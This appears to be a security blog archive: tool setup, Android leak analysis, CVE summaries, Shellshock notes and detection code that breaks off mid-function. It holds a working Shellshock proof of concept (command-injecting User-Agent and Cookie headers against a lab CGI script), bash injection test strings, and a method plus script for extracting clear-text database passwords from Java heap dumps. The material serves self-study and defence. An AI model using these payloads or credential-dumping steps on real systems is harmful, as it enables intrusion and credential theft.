20 Apr 2016

Adding free security plugins in Eclipse

Install Plugins

Install FindBugs and SonarLint by performing these steps:
  • Start Eclipse
  • Menu Help / Eclipse Marketplace
  • Search for FindBugs, install it.
  • Search for SonarLint for Eclipse, choose the optional Java Configuration Helper and install it
Add Find Security Bugs plugin for FindBugs
  • Download the plugin jar file from http://find-sec-bugs.github.io
  • Click Window -> Preferences then go to Java -> FindBugs
  • Open Plugins and misc. Settings tab and click Add to add the Find Security Bugs plugin jar file to the list
  • Restart Eclipse

Enable analysis

For each project you have in Eclipse:
  • Right-click on it and click the menu Configure / Enable SonarLint
Note that FindBugs is already usable after installation, so there is no need to enable it for each project.

Using FindBugs

  • Make sure the project builds without errors first: FindBugs (and therefore Find Security Bugs) analyses compiled bytecode, not source, so a project that does not compile yields no findings.
  • Right-click on the project in Eclipse and select the menu Find Bugs / Find Bugs
  • Wait for the analysis to complete: a popup dialog opens, shows progress and then closes automatically.
  • Open the Bug Explorer. The first time, you will need to select the Eclipse menu Window / Show View / Other / FindBugs / Bug Explorer

Using SonarLint

  • Right click on the project in Eclipse and select the menu SonarLint / Analyze all files
  • View the progress in the Eclipse Console
  • View the Sonar markers in your source code.
  • Occasionally update your analyzers via Help / Update SonarLint Analyzers

For a quick intro, see the SonarLint for Eclipse web page.

19 Apr 2016

Searching for Oracle database passwords in Java VM memory

Below is a trick for finding clear-text database passwords in the memory of a Java process when the program uses (one of) the Oracle JDBC driver(s) (ojdbc6.jar, I think). The commands used come with the standard Oracle JDK.

To list the Java programs, use jps:
$ jps
32488 MainClassName
1945 Jps
The jps command lists the "instrumented" Java processes, i.e. those whose JVM publishes its monitoring data (a JVM started with -XX:-UsePerfData does not show up). Another approach, giving a more inclusive list, would be something like pgrep java. Note that jmap (below) attaches to the target process, so it has to run as the same user as that process, or as root.

Once we have the PID, we can use jmap to dump the process heap to disk:
$ jmap -heap:format=b 32488
Attaching to process ID 32488, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 25.66-b17
Dumping heap to heap.bin ...
Heap dump file created
On JDK 8 the preferred spelling is jmap -dump:format=b,file=heap.bin 32488; both produce an HPROF file. That file now holds everything the application had in memory, credentials included, so protect it like a password store (restrictive permissions, delete it once the analysis is done).

Once we have the heap dump, we can analyze it using jhat. This command also starts a web server for the analyst:
$ jhat heap.bin
Reading from heap.bin...
Dump file created Tue Apr 19 23:11:01 UTC 2016
Snapshot read, resolving...
Resolving 386035 objects...
[...]
WARNING:  Failed to resolve object id 0x585dc0618 for field clazz (signature L)
Chasing references, expect 77 dots.............................................................................
Eliminating duplicate references.............................................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.
When connecting to that port with a web browser (http://127.0.0.1:7000/), we obtain the list of Java classes found in memory. At the bottom of the page, a link named Execute Object Query Language (OQL) query brings us to /oql. That page allows targeted searches of the memory contents. The jhat listener has no authentication, so run it on a workstation you control rather than on a shared host. (jhat was removed from the JDK in version 9; VisualVM provides an equivalent OQL console for HPROF files.)

After a bit of tinkering, I figured out that to find the database password, all I needed to do is run this OQL query:
OQL Query: heap.findClass("oracle.jdbc.driver.T4CConnection")
If this JDBC driver is used by the Java program, we obtain a link to this class. When clicking that link, we can view its instance(s) by clicking on Instances: Exclude subclasses. On the following page, we get something like:
oracle.jdbc.driver.T4CConnection@0x5861d36a8 (1362 bytes)
Total of 1 instances occupying 1362 bytes.
When clicking on the link for the instance, we get another page listing the object's attributes and their values. Among them are the attributes named password, userName and database (URI). Of course, all of those values are the original ones, in the clear!

Now I need to find a way to avoid this continuous exposure of the password in memory, within Oracle's JDBC driver itself. Hopefully it is just an implementation error by the developer using the driver, or there is a better way to use it, or simply a better driver altogether...

More details on OQL: https://visualvm.java.net/oqlhelp.html
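The OQL route needs a tool that understands HPROF. When none is at hand (jhat is gone from JDK 9 onward, or what you hold is a core file or a raw copy of process memory rather than an HPROF dump), a strings-style scan for the connect string still turns up the same material. The following is an added example, not code from the original post: it scans an image for Oracle JDBC URLs in the byte layouts Java data takes and lists the printable strings stored nearby. The image it scans is constructed for the demonstration, and the encodings, the jdbc:oracle: URL forms and the neighbourhood window are its assumptions.

```python
"""Strings-style scan of a memory image for Oracle JDBC connect strings.

Added example, not part of the original post.  Works on any raw image (an HPROF
heap dump from jmap, a core file, a copy of /proc/<pid>/mem); the image built by
build_demo_image() is constructed for the demonstration.
"""
import re
from typing import Dict, List, Tuple

MIN_LEN = 6      # shorter printable runs are mostly noise
WINDOW = 4096    # bytes either side of a hit whose strings are reported as neighbours

# Printable ASCII runs in the byte layouts Java data shows up in: plain
# UTF-8/Latin-1 (HPROF string records, JDK 9+ compact strings, native copies)
# and the two UTF-16 byte orders (char[] contents; big-endian in HPROF dumps).
STRING_PATTERNS = {
    "utf-8":     re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN),
    "utf-16-be": re.compile(rb"(?:\x00[\x20-\x7e]){%d,}" % MIN_LEN),
    "utf-16-le": re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN),
}

# Oracle thin/OCI URL, and the form that embeds credentials: jdbc:oracle:thin:user/pw@host
JDBC_URL_RE = re.compile(r"jdbc:oracle:\w+:[^\s'\"]+")
EMBEDDED_CREDS_RE = re.compile(r"jdbc:oracle:\w+:([^@/\s]+)/([^@\s]+)@")

Hit = Tuple[int, str, str]  # (offset, encoding, text)


def extract_strings(blob: bytes) -> List[Hit]:
    """Return (offset, encoding, text) for every printable run, sorted by offset."""
    hits: List[Hit] = []
    for enc, pat in STRING_PATTERNS.items():
        for m in pat.finditer(blob):
            hits.append((m.start(), enc, m.group().decode(enc)))
    # Reading a UTF-16 run in the opposite byte order, one byte later, yields a
    # shifted copy of the same text; drop those shadows.
    by_pos = {(off, enc): text for off, enc, text in hits}

    def is_shadow(off: int, enc: str, text: str) -> bool:
        if enc == "utf-8":
            return False
        other = "utf-16-le" if enc == "utf-16-be" else "utf-16-be"
        original = by_pos.get((off - 1, other))
        return original is not None and text in original

    return sorted(h for h in hits if not is_shadow(*h))


def find_jdbc_hits(blob: bytes) -> List[Dict]:
    """Locate JDBC connect strings and collect the printable runs stored near them.

    The neighbourhood is a heuristic: a connection's URL, user name and password
    are allocated together and often land close in the heap, but nothing
    guarantees it, so the neighbours are candidates to review, not answers.
    """
    hits = extract_strings(blob)
    results = []
    for off, enc, text in hits:
        m = JDBC_URL_RE.search(text)
        if not m:
            continue
        url = m.group()
        creds = EMBEDDED_CREDS_RE.match(url)
        results.append({
            "offset": off,
            "encoding": enc,
            "url": url,
            "embedded_credentials": creds.groups() if creds else None,
            "neighbours": [t for o, _e, t in hits
                           if o != off and abs(o - off) <= WINDOW and "jdbc:" not in t],
        })
    return results


def build_demo_image() -> bytes:
    """Constructed stand-in for a heap dump: non-printable filler around a few strings."""
    filler = b"\x00\xca\xfe\xba\xbe" * 200

    def be(s: str) -> bytes:          # JDK 8 char[] layout
        return s.encode("utf-16-be")

    return b"".join([
        filler, be("jdbc:oracle:thin:@dbhost.example.internal:1521/ORCLPDB1"),
        filler, be("appuser"),
        filler[:500], be("S3cretP@ss-constructed"),
        filler, b"jdbc:oracle:thin:demo_user/demo_pw@dbhost.example.internal:1521:ORCL",
        filler,
    ])


if __name__ == "__main__":
    for hit in find_jdbc_hits(build_demo_image()):
        print(f"{hit['offset']:#010x} {hit['encoding']:9} {hit['url']}")
        if hit["embedded_credentials"]:
            print("  credentials in URL:", "/".join(hit["embedded_credentials"]))
        for text in hit["neighbours"]:
            print("  nearby:", text)
```

On a real dump, replace build_demo_image() with open("heap.bin", "rb").read(); the scan is blind to object boundaries, which is why the OQL query above remains the precise tool when jhat or VisualVM is available, and this one is the fallback.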

10 Apr 2016

17 Jan 2016

CWEs to test manually

Vulnerabilities that scanners don't (always) detect reliably and that warrant a manual test (after the scan). The [Axx] tags refer to the OWASP Top 10 (2013) category:
  • CWE-285 Improper Access Control (Authorization)
  • CWE-306 Missing Authentication for Critical Function
  • CWE-311 Missing Encryption of Sensitive Data [A06]
  • CWE-352 Cross-Site Request Forgery (CSRF) [A08]
  • CWE-434 Unrestricted Upload of File with Dangerous Type
  • CWE-798 Use of Hard-coded Credentials  
OWASP Top 10 (2013)
  • A02 Broken Authentication and Session  Management
  • A04 Insecure Direct Object References 
  • A05 Security Misconfiguration
  • A06 Sensitive Data Exposure
  • A08 Cross-Site Request Forgery (CSRF)
  • A10 Unvalidated Redirects and Forwards
Those that are less applicable (everywhere) or less testable via black-box methods:
  • CWE-494 Download of Code Without Integrity Check
  • CWE-732 Incorrect Permission Assignment for Critical Resource
  • CWE-754 Improper Check for Unusual or Exceptional Conditions
  • CWE-770 Allocation of Resources Without Limits or Throttling 
  • CWE-807 Reliance on Untrusted Inputs in a Security Decision
  • [...]
Of course, this is only a generic list. The approach still has to be adapted to the context: validate the scanners' findings (identify false positives, adjust severity/priority based on exposure), try to exploit recent vulnerabilities, try new techniques, etc.

10 Jan 2016

Important CVEs that have impacted our web apps

A non-exhaustive list of CVEs that have had a significant, widespread impact on the security of our web applications.
DROWN - CVE-2016-0800
The SSLv2 protocol, as used in OpenSSL before 1.0.1s and 1.0.2 before 1.0.2g and other products, requires a server to send a ServerVerify message before establishing that a client possesses certain plaintext RSA data, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, aka a "DROWN" attack.


FREAK - CVE-2015-0204

SSL/TLS vulnerability that allows an attacker to intercept HTTPS connections between vulnerable clients and servers and force them to use weakened encryption, which the attacker can break to steal or manipulate sensitive data.


LOGJAM - CVE-2015-4000

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE.


WinShock - CVE-2014-6321 - MS14-066

Schannel in Microsoft Windows Server allows remote attackers to execute arbitrary code via crafted packets.


ShellShock (BashBug) - CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.


POODLE - CVE-2014-3566

Padding Oracle On Downgraded Legacy Encryption. The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack.


Heartbleed - CVE-2014-0160

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c.

      Threat & Breach Reports 2015


      27 Jan 2015

      Choosing Android Apps

      A few criteria for selecting Android apps from the Google Play Store:
      • Search for apps in Google Play and review the detailed permissions (Permissions: View Details), or search by permission (criterion: permission "INTERNET / Full network access" excluded) on the IzzyOnDroid site.
      • The app must not request more privileges than it needs.
      • When possible, the app should not combine reading personal data (files, Google accounts, telephone number...) with network access (full network access), unless it comes from an authoritative, somewhat trusted source such as Google or Firefox.
      • When the app has a legitimate need to connect to the Internet, it must not have shown signs of leaking personal (or business) data, e.g. connections to unknown hosts, to tracking services (e.g. flurry.com) or to advertising networks (e.g. admob.com). I run NoRoot Firewall on a test device for a while, pull up the list of connections (IP addresses or domains) and draw my own conclusion. For target hosts where I only have an IP address, I use robtex.com to investigate further.
      • The app must work well for my needs (fast, efficient, readable, adaptable). I much prefer to pay for an app that does what I want. Unfortunately, not many apps outside the Google realm meet the above criteria.

      3 Jan 2015

      Data leakage analysis for Android

      Below are a few ideas for analyzing the network connections our Android apps try to initiate, without having to root the device. Tools mentioned: Android Connection Monitor (connection history), NoRoot Firewall (connection history and egress traffic control), tcpdump and tshark (DNS response history) and Robtex (host reputation and role analysis).

      The method described below should be seen as a first step, to identify which specific app connects to which server. As a second step, the traffic itself would have to be analyzed with conventional techniques such as Wireshark, an SSL interception proxy like mitmproxy, etc. That is not covered here (yet), but this post gives a very good idea of it.

      Connection Monitor

      Start Connection Monitor

      Install Connection Monitor on the Android device from Google Play, start the app and select the Connections Log tab:


      Export Connection Logs

      Let the app run for a while, then export its data by selecting the Settings tab and pressing Export Database and Send:


      NoRoot Firewall

      Start NoRoot Firewall

      Install NoRoot Firewall (by Greyshirts) from Google Play.

      Start NoRoot Firewall, press Start and enable Auto start on boot:

      Configure NoRoot Firewall

      Configure access for each app in NoRoot Firewall from the Pending Access tab, by selecting each app (but don't press Allow or Deny yet):



      Accept or reject each granular network access based on common sense (minimum necessary access) and/or by researching the host on a site such as Robtex or SANS ISC.



      After a few repetitions for the same domains/subnets, configure a generalized rule (but keep the individual entries for future analysis):



      Repeat for all installed apps, iteratively, during normal daily use. Eventually, most apps will be configured as wanted, allowing or blocking traffic based on domain names and your own research.


      The following paragraphs show how to extract the NoRoot Firewall configuration in order to view it on a PC (or even transfer it to another Android device).

      Backup data to PC

      Turn on USB debugging on the Android device.

      Connect the PC to the device over USB and use adb (example on a Mac) to back up the NoRoot Firewall data. On the device, press OK when prompted:
      (macos)$ adb backup -f norootfw.ab app.greyshirts.firewall
      Now unlock your device and confirm the backup operation.
       


      Extract rules from NoRoot Firewall
      Download Android Backup Extractor, then extract the files from the backup:
      (macos)$ java -jar abe.jar unpack norootfw.ab norootfw.tar
      Strong AES encryption not allowed
      Magic: ANDROID BACKUP
      Version: 3
      Compressed: 1
      Algorithm: none

      203264 bytes written to norootfw.tar.
      (macos)$ tar xvf norootfw.tar
      x apps/app.greyshirts.firewall/_manifest
      x apps/app.greyshirts.firewall/f/persistentlog.txt
      x apps/app.greyshirts.firewall/db/db-journal
      x apps/app.greyshirts.firewall/db/db
      x apps/app.greyshirts.firewall/sp/PREF.xml
      Extract the data from the NoRoot Firewall database with sqlite3:
      $ cd apps/app.greyshirts.firewall/db
      $ sqlite3 db
      SQLite version 3.7.13 2012-07-17 17:46:21
      Enter ".help" for instructions
      Enter SQL statements terminated with a ";"
      sqlite> .schema
      CREATE TABLE android_metadata (locale TEXT);
      CREATE TABLE app (appName TEXT, pkg1Name TEXT, appType INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE TABLE filter (serverIp TEXT, serverStrType INTEGER, serverPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, type INTEGER DEFAULT 0, type1 INTEGER DEFAULT 0, appName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, isPolicy INTEGER, appUid INTEGER, priority INTEGER DEFAULT 0, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE TABLE pending (serverIp TEXT, serverHost TEXT, serverPort INTEGER, localIp TEXT, localPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, appName TEXT, allAppName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, appUid INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE INDEX filter_pkg1 ON filter(pkgName);
      CREATE INDEX filter_pkg2 ON filter(pkg2Name);
      CREATE INDEX filter_pkg3 ON filter(pkg3Name);
      CREATE INDEX pend_pkg1 ON pending(pkgName);
      CREATE INDEX pend_pkg2 ON pending(pkg2Name);
      CREATE INDEX pend_pkg3 ON pending(pkg3Name);


      sqlite> select appName,serverIp,serverPort from filter order by appName;
      Aldiko Premium|*|-1
      Aldiko Premium|static.86.130.76.144.clients.your-server.de|80
      Aldiko Premium|hit-block.opendns.com|443
      Android System|192.168.22.1|7
      Android System|*.cloudfront.net|80
      Android System|cache.google.com|80
      Android System|*|-1
      Calendar|*.1e100.net|443
      Calendar|64.233.*.*|443
      Calendar|64.233.171.95|443
      Calendar|qg-in-f95.1e100.net|443
      [...]


      sqlite> .output filter.txt
      sqlite> select appName,serverIp,serverPort from filter order by appName;


      sqlite> .output dump.sql
      sqlite> .dump

      DNS Resolution History

      Full list of DNS mappings

      If we need a full list of the DNS name to IP address mappings seen on the network, we can run tcpdump to capture DNS traffic for a while and then extract the answers with tshark:
      (Linux OS) # tcpdump -n -i eth1 -w dns1.pcap port 53 &
      (attendre quelques heures  |  wait a few hours)
      (Linux OS) # tshark -nr dns1.pcap -Y "(dns.flags.response == 1) && (dns.qry.type == 1)" -T fields -e dns.qry.name -e dns.resp.addr | head

      Running as user "root" and group "root". This could be dangerous.
      nrdp.nccp.netflix.com    107.21.213.110
      myip.opendns.com    166.62.205.221
      googlemail.l.google.com    74.125.226.21,74.125.226.22
      nrdp.nccp.netflix.com    50.17.199.72
      www.jourzero.com    173.194.68.121
      nrdp.nccp.netflix.com    184.73.164.236
      www.jourzero.com    64.233.171.121
      myip.opendns.com    166.62.205.221
      nrdp.nccp.netflix.com    184.73.248.203
      cdn0.nflximg.net    24.200.246.83,24.200.246.57

      Reputation Analysis

      Robtex.com

      For my needs, robtex.com has been a very useful tool that aggregates analysis data from various sources (whois, blacklists, DNS, multi-hosting...). Simply going to the main page and starting a search from the input form at the top gets you to the appropriate details.

      You can also use direct URIs such as http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).

      There's also a nice little trick, described below, for getting colored links and details on hover...

      Integration to Robtex

      When displaying our analysis results, we can integrate them with Robtex data as described here, which gives active links colored according to reputation, with details on hover. The next section shows an example.

      Putting it all together

      Of course, much of the above can be simplified and automated. For now, I have only done a bit of scripting to produce the following sample results, identifying connections that may deserve a closer look...

      App Name               Host Name                                      IP Address       Port
      Aldiko Premium         www.aldiko.co                                  184.168.221.19   80
                             (probably data.flurry.com)                     216.52.203.13    443
                             (probably data.flurry.com)                     74.217.75.110    443
                             static.86.130.76.144.clients.your-server.de    144.76.130.86    80
      Google Play Newsstand  bs.serving-sys.com                                              80
      iSyncr                 ec2-174-129-19-57.compute-1.amazonaws.com                       443


      NB: if the above IP addresses aren't colored or hovering doesn't work, the JavaScript from robtex.com may be blocked locally (e.g. by NoScript) or your client may have been temporarily blacklisted by the service (e.g. if you reload this page too often). If that happens, try again later.
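The joins behind a table like the one above (NoRoot Firewall rules from the `filter` table, reverse-mapped through the DNS answers collected with tshark, with the tracking and advertising domains named earlier flagged) are small enough to script. The following is an added example, not the author's script: it rebuilds the `filter` table in memory from the `.schema` output shown earlier, fills it with constructed rules in the shape of the `select appName,serverIp,serverPort` listing, parses constructed tshark lines in the format of the command above, and emits one app/host/IP/port row per concrete rule. The sample data, the RFC 5737 address used for one host, and the two tracker domains are the assumptions it makes.

```python
"""Join NoRoot Firewall rules with a DNS answer log into one app/host/IP/port table.

Added example, not part of the original post.  The `filter` table DDL is the one
printed by .schema above; the rule rows and the tshark lines are constructed
(addresses come from the post or from the RFC 5737 documentation range).
"""
import ipaddress
import sqlite3
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Domains the post names as tracking/advertising endpoints.
TRACKER_DOMAINS = ("flurry.com", "admob.com")

FILTER_DDL = """
CREATE TABLE filter (serverIp TEXT, serverStrType INTEGER, serverPort INTEGER,
 protocol INTEGER, serverName TEXT, createdData INTEGER, type INTEGER DEFAULT 0,
 type1 INTEGER DEFAULT 0, appName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT,
 isPolicy INTEGER, appUid INTEGER, priority INTEGER DEFAULT 0,
 _id INTEGER PRIMARY KEY AUTOINCREMENT)"""

# Constructed rules in the shape of the `select appName,serverIp,serverPort` output.
DEMO_RULES = [
    ("Aldiko Premium", "www.aldiko.co", 80),
    ("Aldiko Premium", "216.52.203.13", 443),
    ("Aldiko Premium", "74.217.75.110", 443),
    ("Aldiko Premium", "static.86.130.76.144.clients.your-server.de", 80),
    ("Aldiko Premium", "*", -1),
    ("Google Play Newsstand", "bs.serving-sys.com", 80),
    ("Android System", "*.cloudfront.net", 80),
]

# Constructed output of the tshark command above (query name, A records).
DEMO_TSHARK = """\
Running as user "root" and group "root". This could be dangerous.
www.aldiko.co    184.168.221.19
data.flurry.com    216.52.203.13,74.217.75.110
bs.serving-sys.com    192.0.2.10
myip.opendns.com    166.62.205.221
"""


def parse_tshark_dns(text: str) -> Tuple[Dict[str, Set[str]], Dict[str, Set[str]]]:
    """Build ip->names and name->ips maps from `-e dns.qry.name -e dns.resp.addr` output."""
    ip_to_names: Dict[str, Set[str]] = defaultdict(set)
    name_to_ips: Dict[str, Set[str]] = defaultdict(set)
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:          # tshark warnings, answers without A records
            continue
        name = parts[0].lower().rstrip(".")
        for ip in parts[1].split(","):
            ip_to_names[ip].add(name)
            name_to_ips[name].add(ip)
    return ip_to_names, name_to_ips


def is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def is_tracker(name: str) -> bool:
    return any(name == d or name.endswith("." + d) for d in TRACKER_DOMAINS)


def make_demo_db() -> sqlite3.Connection:
    """In-memory copy of the NoRoot Firewall `filter` table holding the constructed rules."""
    conn = sqlite3.connect(":memory:")
    conn.execute(FILTER_DDL)
    conn.executemany("INSERT INTO filter (appName, serverIp, serverPort) VALUES (?, ?, ?)",
                     DEMO_RULES)
    return conn


def build_report(conn: sqlite3.Connection, tshark_text: str) -> List[Tuple[str, str, str, int, str]]:
    """One (app, host, ip, port, tag) row per concrete rule; wildcard rules are skipped.

    Rules that only name an IP get a host from the DNS log (marked "probably",
    since several names may share the address); rules that name a host get an
    IP the same way.  Hosts under a known tracking/advertising domain are tagged.
    """
    ip_to_names, name_to_ips = parse_tshark_dns(tshark_text)
    report = []
    rows = conn.execute("SELECT appName, serverIp, serverPort FROM filter "
                        "WHERE serverIp NOT LIKE '%*%' ORDER BY appName, serverIp")
    for app, target, port in rows:
        if is_ip(target):
            names = sorted(ip_to_names.get(target, set()))
            host = ("(probably %s)" % "/".join(names)) if names else "(unknown)"
            ip = target
        else:
            names = [target.lower()]
            ips = sorted(name_to_ips.get(names[0], set()))
            host, ip = names[0], (ips[0] if ips else "")
        tag = "tracker/ad" if any(is_tracker(n) for n in names) else ""
        report.append((app, host, ip, port, tag))
    return report


if __name__ == "__main__":
    # For a real device, open the extracted database instead of make_demo_db():
    # conn = sqlite3.connect("apps/app.greyshirts.firewall/db/db")
    for row in build_report(make_demo_db(), DEMO_TSHARK):
        print("%-22s %-45s %-16s %-5s %s" % row)
```

Feed it the real `db` file extracted above and the output of the tshark command, and the rows that come back with an empty IP or a "(probably ...)" host are exactly the ones to look up on Robtex.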


      29 Sep 2014

      Current Intel on BashBug / Shellshock

      CVEs
      CVE-2014-6271  (1st bug report)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
      GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

      CVE-2014-7169   (2nd bug/variant, aka AfterShock)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
      GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

      CVE-2014-7186   (3rd bug/variant found by Red Hat's Florian Weimer)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186
      The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

      CVE-2014-7187    (4th bug/variant found by Red Hat's Florian Weimer)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187
      Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

      CVE-2014-6277   (5th bug/variant found by Google's Michael Zalewski)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277
      Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

      CVE-2014-6278   (6th bug/variant found by Google's Michael Zalewski)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278   (reserved, not available yet)
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
      Variant 2. (see Variant 1 CVE-2014-6277 for a description)

      From the SANS Advisory Board: Only the first two listed above are patched in "mainstream" Linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

      Other Info
      GNU Patch Info
      List for current bash (4.3): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/
      Latest bash patch (027): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027

      Botnets

      Network Detection (IDS, IPS, WAF)
      • VRT and EmergingThreats posts showing this is being addressed for Snort
      • ...
      Exploits

      Bash Test Strings
      Command line tests to verify proper patching (and to somehow use in our detections):
      • Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
      • Later patch: foo='() { echo Not patched; }' bash -c foo
      • (search for more...)

      25 Sep 2014

      POC for ShellShock / BashBug CVE-2014-6271

      Ref CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

      I tried it real quick in a VM and it's easy to inject via the User-Agent and Cookie headers. I didn't get much of a result via a GET parameter though (either with URL-encoding or by just encoding the spaces), but I just wanted to prove the point to myself quickly...


      Simple CGI Script on a vulnerable server

      /usr/lib/cgi-bin$ cat echo.sh
      #!/bin/bash
      echo -e "Content-type: text/plain\n\n"
      echo "hi ya! Is there a file in /tmp as a result of this?";
      echo "Output from env:"
      env

      GET request from attacker

      GET /cgi-bin/echo.sh HTTP/1.1
      Host: localhost
      Content-Length: 0
      User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
      Connection: keep-alive

      GET response received by attacker

      HTTP/1.1 200 OK
      Date: Thu, 25 Sep 2014 23:42:53 GMT
      Server: Apache/2.2.16 (Debian)
      Vary: Accept-Encoding
      Content-Length: 1866
      Keep-Alive: timeout=15, max=100
      Connection: Keep-Alive
      Content-Type: text/plain

      hi ya! Is there a file in /tmp as a result of this?
      Output from env:
      [...]
      HTTP_USER_AGENT=() { :
      }
      HTTP_COOKIE=() { :
      }
      _=/usr/bin/env

      Result on attacked server

      $ ls /tmp/Hacked*
      /tmp/HackedViaCookie /tmp/HackedViaUserAgent
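The test strings in the "Bash Test Strings" notes and the two injected headers in the POC above share one syntactic marker: a value that starts with a Bash function export, `() {`. The notes say these strings should "somehow" be reused in detections, so here is a small detector written as an added example (it is not code from the original post). It normalises percent-encoding before matching, which is the case the post tried through a GET parameter, and runs over both raw requests and Apache combined-format access log lines. Every request and log line below is constructed for the example, modelled on the POC.

```python
"""Detecting Shellshock-style payloads in HTTP requests and access logs.

Added example for the 'Bash Test Strings' notes and the CGI proof of concept;
not code from the original post. All sample requests and log lines are
constructed, and the header/field names used are assumptions.
"""
import re
from urllib.parse import unquote_plus

# A Bash function export starts with "() {" (whitespace between the
# parenthesis and the brace is optional). Every test string and both POC
# headers carry it, and network IDS rules for this bug key on the same token.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def is_shellshock_payload(value: str) -> bool:
    """True if the (percent-decoded) value looks like an exported Bash function."""
    # Decode %xx and '+' before matching so that a payload hidden behind
    # URL-encoding in a query parameter is not missed by the detector.
    return bool(SHELLSHOCK_RE.search(unquote_plus(value)))


def scan_request(raw_request: str) -> list:
    """Return [(location, value)] for query parameters and headers that match."""
    findings = []
    lines = raw_request.splitlines()
    if not lines:
        return findings
    parts = lines[0].split()                       # METHOD target HTTP/x.y
    if len(parts) >= 2 and "?" in parts[1]:
        for pair in parts[1].split("?", 1)[1].split("&"):
            name, _, val = pair.partition("=")
            if is_shellshock_payload(val):
                findings.append(("query:" + unquote_plus(name), unquote_plus(val)))
    for line in lines[1:]:
        if not line.strip():
            break                                  # blank line ends the headers
        name, _, val = line.partition(":")
        if is_shellshock_payload(val.strip()):
            findings.append(("header:" + name.strip(), val.strip()))
    return findings


# Apache combined log format; the request line, referer and user-agent are
# the client-controlled fields worth scanning after the fact.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')


def scan_access_log(lines) -> list:
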